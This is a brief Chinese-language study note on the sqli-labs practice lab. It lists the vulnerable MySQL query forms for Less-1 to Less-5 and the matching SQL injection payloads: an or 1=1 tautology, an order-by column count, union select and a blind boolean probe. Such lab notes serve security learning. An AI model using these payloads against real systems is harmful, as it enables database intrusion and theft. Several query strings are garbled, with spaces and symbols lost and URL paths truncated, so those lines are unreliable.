sqli lbas 1 数据库是mysql
sql 查询语句 :
sql="SELECT∗FROMusersWHEREid=′
id’ LIMIT 0,1”;
在index.php?id=,构造可能的sql语句,通过判断是否存在sql注入
sql语句 中的注释: – (注意要空格%20 或者是在后面写+)
1. /index.php?id=2%27%20or%201=1%20–+ 存在注入
2. sqli-labs-master/Less-1/?id=1’ order by 3 –+ 3列
======================================
sqli labs中的查询语句
1 “SELECT * FROM users WHERE id= ‘
id′LIMIT0,1”;2.“SELECT∗FROMusersWHEREid=
id LIMIT 0,1”;
3. “SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1”;
方法:s-master/Less-3/?id=-2’) union select 1,2,3 –+
SELECT * FROM users WHERE id=($id) LIMIT 0,1
报错:li-labs-master/Less-4/index.php?id=1”
方法:id=0”) union select 1,2,3–+SELECT * FROM users WHERE id=’$id’ LIMIT 0,1
盲注:(不会报错)
报错:labs-master/Less-5/index.php?id=1’
方法:p?id=-1’ and (select count(*) from users where id=1) >0 –+